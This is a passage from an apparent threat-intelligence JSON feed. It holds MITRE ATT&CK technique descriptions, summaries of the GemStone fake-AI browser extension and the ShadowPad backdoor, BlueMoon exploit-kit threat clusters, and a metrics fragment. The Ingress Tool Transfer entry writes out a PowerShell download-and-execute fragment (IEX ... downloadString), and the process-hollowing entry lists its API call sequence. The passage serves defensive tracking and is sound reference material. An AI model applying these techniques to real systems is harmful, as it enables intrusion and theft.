Common Third-party Applications\n\nOther applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.", "created_on": "2020-02-26T13:49:09.000Z", "name": "Exploitation for Client Execution"}, {"id": "657941fe-6f7e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.\n\nWhen initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.\n\nAdversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) or [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570).", "created_on": "2020-03-26T16:25:24.000Z", "name": "Exploitation for Privilege Escalation"}, {"id": "8a0ce8cb-5aeb-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.", "created_on": "2020-02-29T12:03:46.000Z", "name": "Fallback Channels"}, {"id": "4532b1ca-6916-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-03-18T12:44:55.000Z", "name": "Finance"}, {"id": "71ae6b50-1397-4a45-bdcf-8a7d1f41398a", "category": "trellix-tool", "description": "GemStone is a malicious browser extension that pretends to be an official AI browsing tool powered by Google Gemini. It requests broad permissions such as access to cookies, web navigation, tabs, storage, and active scripting. Beneath this disguise, it operates a hidden JavaScript service worker acting as a browser surveillance and credential theft backdoor. The malware stores its internal state and command server configuration directly within the local storage of the Chrome extension, setting up auto-recording functions as soon as it is loaded. By leveraging built in background scheduling capabilities, the extension periodically runs tasks to steal stolen data, check system flags, and fetch new instructions from an external control domain hosted on Cloudflare.", "created_on": "2026-09-10T00:12:17.000Z", "name": "GemStone"}, {"id": "c664b910-2977-414a-ada9-ccfaba52761b", "category": "trellix-tool", "description": "Google Chrome is a web browser developed by Google. It is known for its speed, simplicity, and user-friendly interface. Launched in 2008, Chrome has become one of the most widely used browsers worldwide. It offers features such as tabbed browsing, synchronization across devices, an extensive library of extensions, and strong security measures. Chrome is built on the open-source Chromium project and is available on various operating systems, including Windows, macOS, Linux, Android, and iOS.", "created_on": "2023-08-23T21:12:35.000Z", "name": "Google Chrome"}, {"id": "ce81f788-6de3-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-03-24T15:26:17.000Z", "name": "Government, Administration"}, {"id": "e04d5ece-10b1-430c-8ff1-e1efac68764b", "category": "country", "description": "Indonesia", "created_on": "2022-04-13T19:13:20.000Z", "name": "indonesia"}, {"id": "c4685e8c-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). \n\nOn Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)  A number of these tools, such as `wget`, `curl`, and `scp`, also exist on ESXi. After downloading a file, a threat actor may attempt to verify its integrity by checking its hash value (e.g., via `certutil -hashfile`).(Citation: Google Cloud Threat Intelligence COSCMICENERGY 2023)\n\nAdversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with [Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: Trellix_search-ms)\n\nFiles can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)", "created_on": "2020-02-26T13:49:11.000Z", "name": "Ingress Tool Transfer"}, {"id": "50a31a88-8531-46a2-a25b-f15813137835", "category": "mitre-attack-pattern", "description": "Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites, or performing initial speed testing to confirm bandwidth.\n\nAdversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.", "created_on": "2021-10-01T13:08:40.000Z", "name": "Internet Connection Discovery"}, {"id": "2a2c9204-3e03-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)\n\nJScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)\n\nJavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple\u2019s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple\u2019s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple\u2019s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility <code>osascript</code>, they can be compiled into applications or script files via <code>osacompile</code>, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode)\n\nAdversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).", "created_on": "2020-12-14T11:54:47.000Z", "name": "JavaScript"}, {"id": "db3f5146-6e39-4108-87fa-3e932f52e84d", "category": "trellix-tool", "description": "JavaScript, often abbreviated as JS, is a programming language that conforms to the ECMAScript specification. JavaScript is high-level, often just-in-time compiled and multi-paradigm. It has dynamic typing, prototype-based object-orientation and first-class functions.\r\n\r\nJavaScript is used for web development, in web applications, for game development, and much more. It allows you to implement dynamic features on web pages that cannot be done with only HTML and CSS. Many browsers use JavaScript as a scripting language for doing dynamic things on the web. Any time you see a click-to-show dropdown menu, extra content added to a page, and dynamically changing element colours on a page, to name a few features, you're seeing the effects of JavaScript.\r\n\r\nExploiting JavaScript in cyber attacks is not exactly new, but the increasing frequency of this attack vector is. Even in 2020, JavaScript-based attacks are still a matter of great concern. The danger in these attacks lies in one key aspect: malware delivered via infected JavaScript files doesn\u2019t need user interaction. Better said, a user could get infected with malware without doing anything else than browsing a website. JavaScript is not an insecure programming language, code bugs or improper implementations can create backdoors which attackers can exploit.", "created_on": "2021-11-24T06:14:13.000Z", "name": "JavaScript"}, {"id": "2a156d6e-3575-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. In order to increase the likelihood of capturing credentials quickly, an adversary may also perform actions such as clearing browser cookies to force users to reauthenticate to systems.(Citation: Talos Kimsuky Nov 2021)\n\nKeylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.\n* Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* Custom drivers.\n* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks) ", "created_on": "2020-12-03T14:38:09.000Z", "name": "Keylogging"}, {"id": "bce1ab72-305c-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).", "created_on": "2020-11-27T03:00:42.000Z", "name": "Malicious Link"}, {"id": "8adf2a30-964d-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-05-15T01:43:57.000Z", "name": "Manufacturing"}, {"id": "beab4bcf-3513-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.\n\nTasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)", "created_on": "2020-12-03T03:00:48.000Z", "name": "Masquerade Task or Service"}, {"id": "294bbdf8-4134-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.\n\nAdversaries may also use the same icon of the file they are trying to mimic.", "created_on": "2020-12-18T13:23:05.000Z", "name": "Match Legitimate Name or Location"}, {"id": "e4a18aa5-ad7a-11ea-9477-02d538d9640e", "category": "sector", "description": "", "created_on": "2020-06-13T13:36:32.000Z", "name": "Mining"}, {"id": "c3ce2246-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may interact with the Windows Registry as part of a variety of other techniques to aid in defense evasion, persistence, and execution.\n\nAccess to specific areas of the Registry depends on account permissions, with some keys requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification.(Citation: Microsoft Reg) Other tools, such as remote access tools, may also contain functionality to interact with the Registry through the Windows API.\n\nThe Registry may be modified in order to hide configuration information or malicious payloads via [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).(Citation: Unit42 BabyShark Feb 2019)(Citation: Avaddon Ransomware 2021)(Citation: Microsoft BlackCat Jun 2022)(Citation: CISA Russian Gov Critical Infra 2018) The Registry may also be modified to [Impair Defenses](https://attack.mitre.org/techniques/T1562), such as by enabling macros for all Microsoft Office products, allowing privilege escalation without alerting the user, increasing the maximum number of allowed outbound requests, and/or modifying systems to store plaintext credentials in memory.(Citation: CISA LockBit 2023)(Citation: Unit42 BabyShark Feb 2019)\n\nThe Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system.(Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.\n\nFinally, Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API.(Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence.(Citation: TrendMicro POWELIKS AUG 2014)(Citation: SpectorOps Hiding Reg Jul 2017)", "created_on": "2020-02-26T13:49:10.000Z", "name": "Modify Registry"}, {"id": "c11d5a02-6de3-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-03-24T15:25:55.000Z", "name": "NGO"}, {"id": "beefee6e-3513-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.  \n\nProcess hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as <code>CreateProcess</code>, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as <code>ZwUnmapViewOfSection</code> or <code>NtUnmapViewOfSection</code>  before being written to, realigned to the injected code, and resumed via <code>VirtualAllocEx</code>, <code>WriteProcessMemory</code>, <code>SetThreadContext</code>, then <code>ResumeThread</code> respectively.(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017)\n\nThis is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process. ", "created_on": "2020-12-03T03:00:48.000Z", "name": "Process Hollowing"}, {"id": "34fe6633-ca2c-484d-a48f-b72758387194", "category": "mitre-attack-pattern", "description": "Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk (e.g., [Shared Modules](https://attack.mitre.org/techniques/T1129)).\n\nReflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL) For example, the `Assembly.Load()` method executed by [PowerShell](https://attack.mitre.org/techniques/T1059/001) may be abused to load raw code into the running process.(Citation: Microsoft AssemblyLoad)\n\nReflective code injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the \u201cinjection\u201d loads code into the processes\u2019 own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks)", "created_on": "2021-12-07T06:14:11.000Z", "name": "Reflective Code Loading"}, {"id": "bea4602e-3513-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) (WMI) to create a scheduled task. Adversaries may also utilize the Powershell Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from `schtasks /query` and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).(Citation: SigmaHQ)(Citation: Tarrask scheduled task) Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., `Index` value) within associated registry keys.(Citation: Defending Against Scheduled Task Attacks in Windows Environments) ", "created_on": "2020-12-03T03:00:48.000Z", "name": "Scheduled Task"}, {"id": "c3ec91d2-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as <code>CopyFromScreen</code>, <code>xwd</code>, or <code>screencapture</code>.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)\n", "created_on": "2020-02-26T13:49:10.000Z", "name": "Screen Capture"}, {"id": "398f4f07-acb7-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish this by disabling individual services of high importance to an organization, such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible.(Citation: Novetta Blockbuster) In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server, or on virtual machines hosted on ESXi infrastructure.(Citation: SecureWorks WannaCry Analysis)(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)\n\nThreat actors may also disable or stop service in cloud environments. For example, by leveraging the `DisableAPIServiceAccess` API in AWS, a threat actor may prevent the service from creating service-linked roles on new accounts in the AWS Organization.(Citation: Datadog Security Labs Cloud Persistence 2025)(Citation: AWS DisableAWSServiceAccess)", "created_on": "2020-06-12T14:15:53.000Z", "name": "Service Stop"}, {"id": "f679072c-6bc3-4f62-bf94-0c8999857fa7", "category": "trellix-tool", "description": "ShadowPad is a sophisticated modular backdoor that has become a staple tool for numerous Chinese state-sponsored threat actors. It originally emerged as a successor to the PlugX malware after being discovered hidden within legitimate software updates during high-profile supply chain attacks. The malware is designed for extreme stealth and flexibility, allowing attackers to deploy various functional modules for keystroke logging, file exfiltration, and network reconnaissance depending on their specific objectives. By utilizing a multilayered loading process that often involves DLL side-loading, ShadowPad can maintain long-term persistence within compromised networks.", "created_on": "2021-08-20T20:51:03.000Z", "name": "ShadowPad"}, {"id": "6c2c7c7d-3b7b-4731-958c-7f97c831595c", "category": "country", "description": "Singapore", "created_on": "2022-04-08T21:17:02.000Z", "name": "singapore"}, {"id": "9c9950f5-2adc-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) \n\nUtilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.(Citation: Awesome Executable Packing)  ", "created_on": "2020-11-20T03:00:57.000Z", "name": "Software Packing"}, {"id": "bed41cbd-3513-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place.\n\nAdversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an \"IDN homograph attack\").(Citation: CISA IDN ST05-016) URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an \u201c@\u201d symbol: for example, `hxxp://google.com@1157586937`.(Citation: Mandiant URL Obfuscation 2023)\n\nAdversaries may also utilize links to perform consent phishing/spearphishing campaigns to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s that grant immediate access to the victim environment. For example, a user may be lured into granting adversaries permissions/access via a malicious OAuth 2.0 request URL that when accepted by the user provide permissions/access for malicious applications.(Citation: Trend Micro Pawn Storm OAuth 2017)(Citation: Microsoft OAuth 2.0 Consent Phishing 2021) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls.(Citation: Microsoft OAuth 2.0 Consent Phishing 2021)\n\nSimilarly, malicious links may also target device-based authorization, such as OAuth 2.0 device authorization grant flow which is typically used to authenticate devices without UIs/browsers. Known as \u201cdevice code phishing,\u201d an adversary may send a link that directs the victim to a malicious authorization page where the user is tricked into entering a code/credentials that produces a device token.(Citation: SecureWorks Device Code Phishing 2021)(Citation: Netskope Device Code Phishing 2021)(Citation: Optiv Device Code Phishing 2021)", "created_on": "2020-12-03T03:00:48.000Z", "name": "Spearphishing Link"}, {"id": "000cf478-cbbf-11ea-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.\n\nCookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie)\n\nThere are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) Adversaries may also steal cookies by injecting malicious JavaScript content into websites or relying on [User Execution](https://attack.mitre.org/techniques/T1204) by tricking victims into running malicious JavaScript in their browser.(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)\n\nThere are also open source frameworks such as `Evilginx2` and `Muraena` that can gather session cookies through a malicious proxy (e.g., [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)\n\nAfter an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application.", "created_on": "2020-07-22T01:59:38.000Z", "name": "Steal Web Session Cookie"}, {"id": "9ca75d59-2adc-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.", "created_on": "2020-11-20T03:00:57.000Z", "name": "Symmetric Cryptography"}, {"id": "24603da9-9c82-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-05-22T23:15:35.000Z", "name": "Trade"}, {"id": "b83c4260-85b7-11eb-9477-02d538d9640e", "category": "country", "description": "United States of America", "created_on": "2021-03-15T17:56:08.000Z", "name": "united states of america"}, {"id": "3dbf538b-90f5-445c-9224-b21f98bb14cb", "category": "trellix-threat-actor", "description": "UNK_DoubleCheck is a suspected espionage threat actor that utilized the BlueMoon exploit kit in campaigns targeting a Vietnamese manufacturing company. This group leveraged spearphishing emails that led victims to malicious landing pages, executing a Rust-based loader infection chain upon successful browser exploitation and maintaining persistence on compromised hosts using distinct scheduled task names such as MicrosoftEdgeUpdatesTaskMachine and Avpcheckup along with specific registry key modifications.", "created_on": "2026-09-10T00:12:17.000Z", "name": "UNK_DoubleCheck"}, {"id": "c85c6e40-a1ee-4955-b61c-d9ef63fd66a5", "category": "trellix-threat-actor", "description": "The threat cluster UNK_LateNight deployed the BlueMoon exploit kit in targeted phishing campaigns aimed at multiple United States aerospace companies, using business-to-business themed lures to drive targets to compromised infrastructure. Once the browser exploit chain successfully executed, it delivered a payload that dropped and executed additional malware, leading to post-exploitation activity including the deployment of ShadowPad and the creation of scheduled tasks named EdgeCore_AutoUpdate for persistence.", "created_on": "2026-09-10T00:12:17.000Z", "name": "UNK_LateNight"}, {"id": "059c3243-af1d-4d6d-96b6-686d08a6a370", "category": "trellix-threat-actor", "description": "UNK_QuietRacket is a suspected China-aligned espionage threat actor that adopted the BlueMoon exploit kit to target entities in Southeast Asia, including campaigns where they spoofed an Indonesian government employee in phishing communications. By directing recipients to malicious sites hosting the browser exploit chain, the cluster attempted to deliver tailored secondary payloads and establish persistent access to target systems for intelligence gathering purposes.", "created_on": "2026-09-10T00:12:17.000Z", "name": "UNK_QuietRacket"}, {"id": "8b5b8179-438e-434b-a013-6bdbced3748c", "category": "country", "description": "Vietnam", "created_on": "2021-10-01T13:08:43.000Z", "name": "vietnam"}, {"id": "9ce70935-2adc-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as HTTP/S(Citation: CrowdStrike Putter Panda) and WebSocket(Citation: Brazking-Websockets) that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ", "created_on": "2020-11-20T03:00:57.000Z", "name": "Web Protocols"}, {"id": "9cc48241-2adc-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)\n\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.", "created_on": "2020-11-20T03:00:57.000Z", "name": "Windows Command Shell"}], "metrics": [{"date": "2026-09-10", "nodes": 1.56, "events": 45.29, "sectors": [{"sector": "Unknown", "affected": 13.13, "events": 380.84, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 4.55, "events": 154.33, "total": 1000000}, {"iso_code": "DE", "affected": 0.52, "events": 0.52, "total": 1000000}, {"iso_code": "IT", "affected": 3.36, "events": 3.36, "total": 1000000}, {"iso_code": "VN", "affected": 3.65, "events": 3.65, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-11", "nodes": 